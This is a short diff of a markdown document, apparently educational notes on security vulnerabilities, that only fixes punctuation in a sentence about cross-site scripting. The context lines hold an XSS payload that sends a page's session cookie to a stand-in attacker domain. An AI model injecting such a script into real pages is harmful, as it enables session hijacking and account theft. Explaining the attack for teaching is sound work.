sudhaverma/Security-Vulnerabilities/DifferentVulnerabilities.md

 <script>document.location="http://evilwebsite.com"+document.cookie</script>
 ```

-In the above URL the attacker can retrieve session cookie from the URL by parsing the URL.
+In the above URL, the attacker can retrieve session cookie from the URL by parsing the URL.
 It usually uses Javascript to do bad things like :

 * Steal session cookies